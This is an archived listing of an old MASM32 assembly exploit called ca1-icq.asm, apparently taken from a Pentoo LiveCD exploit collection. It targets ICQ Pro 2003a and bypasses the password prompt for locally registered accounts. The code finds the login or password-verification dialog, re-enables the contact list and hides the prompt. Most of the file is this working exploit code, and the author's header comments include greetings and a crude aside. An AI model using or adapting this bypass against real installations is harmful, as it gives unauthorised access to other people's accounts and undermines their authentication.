home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / im / icq / ca1-icq.asm < prev    next >
Encoding:
Assembly Source File  |  2005-02-12  |  2.4 KB  |  65 lines
  2. ;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE      BOF
  3. ; -------------------------------------------------------------------------
  4. ;
  5. ;  07/02/2003 - ca1-icq.asm
  6. ;  ICQ Password Bypass exploit.
  7. ;  written by Cau Moura Prado (aka ca1)
  8. ;  mouraprado@infoguerra.com.br - ICQ 373313
  9. ;
  10. ;  This exploit allows you to login to ICQ server using any account registered *locally*
  11. ;  no matter the 'save password' option is checked or not. High level security is also bypassed.
  12. ;  All you have to do is run the exploit and set status property using your mouse when the flower
  13. ;  is yellow. If you accidentally set status to offline then you will need to restart ICQ and run
  14. ;  the exploit again. Greets to: Alex Demchenko(aka Coban), my cousin Rhenan for testing the exploit
  15. ;  on his machine and that tiny Israeli company for starting the whole thing. Oh sure.. hehehe
  16. ;  I can't forget...  many kisses to those 3 chicks from my building for being so hot!! ;)
  17. ;
  18. ;
  19. ;        uh-oh!
  20. ;         ___
  21. ;      __/   \__
  22. ;     /  \___/  \        Vulnerable:
  23. ;     \__/+ +\__/          ICQ Pro 2003a Build #3800
  24. ;     /   ~~~   \
  25. ;     \__/   \__/        Not Vulnerable:
  26. ;        \___/             ICQ Lite alpha Build 1211
  27. ;                          ICQ 2001b and ICQ 2002a
  28. ;    tHe Flaw Power        All other versions were not tested.
  29. ;                            coded with masm32
  30. ; _______________________________________________________________________________exploit born in .br
  31.  
  32. .386
  33. .model flat, stdcall
  34. option casemap:none
  35. include \masm32\include\user32.inc
  36. include \masm32\include\kernel32.inc
  37. includelib \masm32\lib\user32.lib
  38. includelib \masm32\lib\kernel32.lib
  39. .data
  40. szTextHigh byte 'Password Verification', 0
  41. szTextLow byte 'Login to server', 0
  42. szClassName byte '#32770', 0
  43. .data?
  44. hWndLogin dword ?
  45. .code
  46. _entrypoint:
  47.  invoke FindWindow, addr szClassName, addr szTextHigh
  48.  mov hWndLogin, eax
  49.  .if hWndLogin == 0
  50.    invoke FindWindow, addr szClassName, addr szTextLow
  51.    mov hWndLogin, eax
  52.  .endif
  53.  invoke GetParent, hWndLogin
  54.  invoke EnableWindow, eax, 1      ;Enable ICQ contact
  55. list
  56.  invoke ShowWindow, hWndLogin, 0  ;get rid of Login
  57. screen (don't kill this window)
  58.  invoke ExitProcess, 0            ;uhuu.. cya! i gotta
  59. sleep!
  60. end _entrypoint
  61.  
  63. ;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE      EOF
  64. ; -------------------------------------------------------------------------
  65.